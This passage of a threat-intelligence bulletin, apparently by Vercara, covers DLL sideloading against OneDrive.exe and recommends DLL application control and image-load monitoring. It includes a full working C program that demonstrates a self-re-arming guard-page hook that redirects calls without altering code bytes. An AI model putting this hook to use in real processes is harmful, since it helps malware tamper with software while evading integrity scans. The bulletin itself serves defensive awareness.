The attack also employs a hooking technique built on Vectored Exception Handling and the PAGE_GUARD memory protection flag. Instead of inline hooks, which overwrite the first bytes of a function and are readily detected by integrity checks, this approach deliberately triggers memory exceptions to intercept API calls. The malicious DLL sets PAGE_GUARD on the page containing a target function such as CreateWindowExW; when OneDrive.exe calls it, the resulting STATUS_GUARD_PAGE_VIOLATION is delivered to the attacker’s exception handler, which redirects execution to an attacker-controlled function. Because a guard page is cleared after one access, the handler sets the CPU’s single-step flag and re-applies PAGE_GUARD from the resulting STATUS_SINGLE_STEP exception, so the hook re-arms itself after every interception while the target function’s bytes remain untouched and signature-based memory scans see nothing amiss. Once loaded, the malicious DLL spawns a separate thread to execute arbitrary payloads without blocking the application’s initialization. The proof-of-concept implementation launches additional processes while hiding their windows, enabling covert operations on compromised systems. Security professionals are advised to implement application control, monitor DLL loading behavior (for example, alerting when a DLL named after a system library is loaded from an application directory rather than System32), and validate the digital signatures of loaded libraries, not only of the host process.
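The guard-page hook described above, as an added example that is not the Kas-sec proof of concept: a POSIX/x86-64 analog in which mprotect(PROT_NONE) stands in for PAGE_GUARD, a SIGSEGV handler for the vectored exception handler, and the CPU trap flag for STATUS_SINGLE_STEP. The hooked "API" is four constructed machine-code bytes implementing a + b, copied onto its own page because a page guard covers every function on that page; hooked_add, run_guard_hook_demo and the helper names are this example’s own. It builds with gcc on x86-64 Linux.

```c
#define _GNU_SOURCE
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <ucontext.h>

#define PAGE   4096u
#define X86_TF 0x100u   /* EFLAGS trap flag: run one instruction, then #DB -> SIGTRAP */

typedef int (*binop_t)(int, int);

/* Constructed stand-in for the API being hooked: x86-64 bytes for
 *   lea eax, [rdi+rsi] ; ret      i.e.  int add(int a, int b) { return a + b; }
 * It gets its own page because a page guard covers everything on that page. */
static const uint8_t target_code[] = { 0x8d, 0x04, 0x37, 0xc3 };

uint8_t *target_page;                /* guarded page (plays the DLL's code page) */
volatile sig_atomic_t passthrough;   /* 1 while the hook is calling the real function */
volatile sig_atomic_t hook_hits;     /* number of intercepted calls */

static void arm_guard(void)  { mprotect(target_page, PAGE, PROT_NONE); }
static void lift_guard(void) { mprotect(target_page, PAGE, PROT_READ | PROT_EXEC); }

/* Attacker-controlled replacement; same calling convention as the target. */
static int hooked_add(int a, int b) {
    hook_hits++;
    passthrough = 1;                          /* next fault on the page must not redirect */
    int real = ((binop_t)target_page)(a, b);  /* faults; handler lifts the guard and steps */
    passthrough = 0;
    return real * 2;                          /* tamper with the value the caller receives */
}

/* Plays the vectored exception handler receiving STATUS_GUARD_PAGE_VIOLATION. */
static void on_guard_fault(int sig, siginfo_t *si, void *ctx) {
    (void)sig; (void)si;
    ucontext_t *uc = ctx;
    uintptr_t rip = (uintptr_t)uc->uc_mcontext.gregs[REG_RIP];
    if (rip < (uintptr_t)target_page || rip >= (uintptr_t)target_page + PAGE) {
        signal(SIGSEGV, SIG_DFL);             /* a real crash, not our guard: let it die */
        return;
    }
    lift_guard();                             /* PAGE_GUARD is one-shot; mirror that */
    if (rip == (uintptr_t)target_page && !passthrough)
        uc->uc_mcontext.gregs[REG_RIP] = (greg_t)(uintptr_t)hooked_add;  /* redirect */
    uc->uc_mcontext.gregs[REG_EFL] |= X86_TF; /* single-step so the guard can be re-armed */
}

/* Plays the handler receiving STATUS_SINGLE_STEP: re-arm the guard, stop stepping. */
static void on_single_step(int sig, siginfo_t *si, void *ctx) {
    (void)sig; (void)si;
    ucontext_t *uc = ctx;
    arm_guard();
    uc->uc_mcontext.gregs[REG_EFL] &= ~(greg_t)X86_TF;
}

/* Installs the hook, calls the target through a plain function pointer, and
 * returns the number of interceptions (2 on success, negative on failure). */
int run_guard_hook_demo(void) {
    target_page = mmap(NULL, PAGE, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (target_page == MAP_FAILED) return -1;
    memcpy(target_page, target_code, sizeof target_code);
    lift_guard();                              /* page is now read+execute only */
    binop_t add = (binop_t)target_page;
    hook_hits = 0;

    int unhooked = add(2, 3);                  /* 5: nothing armed yet */

    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_flags = SA_SIGINFO;
    sa.sa_sigaction = on_guard_fault;
    sigaction(SIGSEGV, &sa, NULL);
    sa.sa_sigaction = on_single_step;
    sigaction(SIGTRAP, &sa, NULL);
    arm_guard();                               /* not one byte of `add` has changed */

    int hooked = add(2, 3);                    /* 10: redirected, original run, result doubled */
    int again  = add(4, 4);                    /* 16: the guard re-armed itself after the first hit */

    lift_guard();
    signal(SIGSEGV, SIG_DFL);
    signal(SIGTRAP, SIG_DFL);
    munmap(target_page, PAGE);
    if (unhooked != 5 || hooked != 10 || again != 16) return -2;
    return (int)hook_hits;
}

int main(void) {
    printf("intercepted calls: %d\n", run_guard_hook_demo());
    return 0;
}
```

Two properties of the real technique carry over. A memory scanner comparing the target’s bytes against the on-disk image finds no change, because the redirect lives entirely in the exception context. And the guard is a per-page, not per-function, mechanism: while the hook calls the original with passthrough set, every instruction on the guarded page faults and is single-stepped, which is why the page’s other functions pay a performance cost and why a defender watching for a flood of guard-page exceptions (or, on Windows, for a process registering vectored exception handlers from an unsigned module) has something concrete to alert on.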
(TLP: CLEAR) Comments: This DLL sideloading attack against OneDrive demonstrates the persistent weakness of the Windows dynamic library loading mechanism, which continues to provide attackers with reliable execution vectors despite decades of awareness within the security community. The technique is particularly insidious because it weaponizes a legitimate, digitally signed Microsoft application to provide the trusted execution context, effectively turning the operating system’s code-signing protections against themselves. Many security solutions implement trust-based detection models in which signed binaries from publishers like Microsoft receive reduced scrutiny, creating a blind spot that DLL sideloading specifically exploits. version.dll is a deliberate choice: it is loaded by a large share of Windows applications, it is not a KnownDLL and so is subject to the application-directory-first search order, and its export table is small enough that a proxy DLL can forward it in full, so the substitution produces no functional symptoms for the user. Organizations should extend application control to DLLs, not just executables (Windows Defender Application Control policies apply to both), so that an unsigned version.dll in a user-writable directory is blocked rather than merely logged; where full DLL enforcement is impractical at scale, image-load telemetry such as Sysmon Event ID 7, with its signature fields, can at least flag a system library name loaded from outside System32 or SysWOW64.
(TLP: CLEAR) Recommended best practices/regulations: NIST SP 800-53 Rev5 SI-3: “MALICIOUS CODE PROTECTION
Control:
- Implement [Selection (one or more): signature based; non-signature based] malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code.
- Automatically update malicious code protection mechanisms as new releases are available in accordance with organizational configuration management policy and procedures.
- Configure malicious code protection mechanisms to: 1. Perform periodic scans of the system [Assignment: organization-defined frequency] and real-time scans of files from external sources at [Selection (one or more): endpoint; network entry and exit points] as the files are downloaded, opened, or executed in accordance with organizational policy; and 2. [Selection (one or more): block malicious code; quarantine malicious code; take [Assignment: organization-defined action]]; and send alert to [Assignment: organization defined personnel or roles] in response to malicious code detection.
- Address the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the system.”
SI-3 requires malware detection and prevention mechanisms. These can run on the device, as with anti-virus agents, and can be augmented by Protective DNS provided by the network the device is on or across the Internet. This provides defense in depth and covers devices such as Internet of Things (IoT) devices or some servers that cannot run an endpoint agent.
(TLP: CLEAR) DigiCert: DigiCert’s Protective DNS solution, UltraDDR (DNS Detection and Response), enforces malware filtering as a network service using four distinct malware-detection engines, including a dynamic decision engine that compares domain details, DNS query details, query answers, and other data points to determine whether a domain is malicious before endpoints can be infected by it.
Source: https://cybersecuritynews.com/onedrive-exe-dll-sideloading-with-malicious-dll-files/
Traffic Light Protocol (TLP)
Except where noted, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.
About Vercara
The world’s top brands depend on Vercara to safeguard their digital infrastructure and online presence. Vercara offers a suite of cloud-delivered services that are always secure, reliable, and available and enable global businesses to thrive online. UltraSecure protects organizations’ networks and applications against risks and downtime, ensuring that businesses and their customers enjoy exceptional and uninterrupted interactions all day, every day. Delivering the industry’s best performance and always-on service, Vercara’s mission-critical security portfolio provides best-in-class DNS, application, and network security, including DDoS, WAF, and Bot management services to its global 5000 customers and beyond.
To learn more about Vercara solutions, please contact us.